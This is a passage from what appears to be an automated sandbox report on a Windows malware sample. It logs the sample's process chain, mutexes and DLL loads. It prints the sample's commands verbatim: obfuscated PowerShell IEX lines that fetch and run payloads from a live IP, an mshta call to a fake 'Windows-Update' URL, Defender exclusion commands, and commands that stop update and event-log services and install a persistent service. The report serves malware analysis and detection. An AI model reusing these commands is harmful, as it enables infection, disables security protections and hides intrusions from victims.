              Source: C:\Windows\System32\dialer.exeCode function: 49_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,49_2_000000014000226C
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,49_2_00000001400019C4
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,49_2_000000014000226C
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tempScript.jsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs"
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 65%
              Source: LB31.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: Mig.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wscript.exe "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://176.113.115.178/Windows-Update
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB31.exe "C:\Users\user\AppData\Roaming\LB31.exe"
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LIB"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LIB"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\Mig\Mig.exe C:\ProgramData\Mig\Mig.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wscript.exe "wscript" C:\Users\user\AppData\Local\Temp\tempScript.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-UpdateJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://176.113.115.178/Windows-UpdateJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB31.exe "C:\Users\user\AppData\Roaming\LB31.exe"
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LIB"
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LIB"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
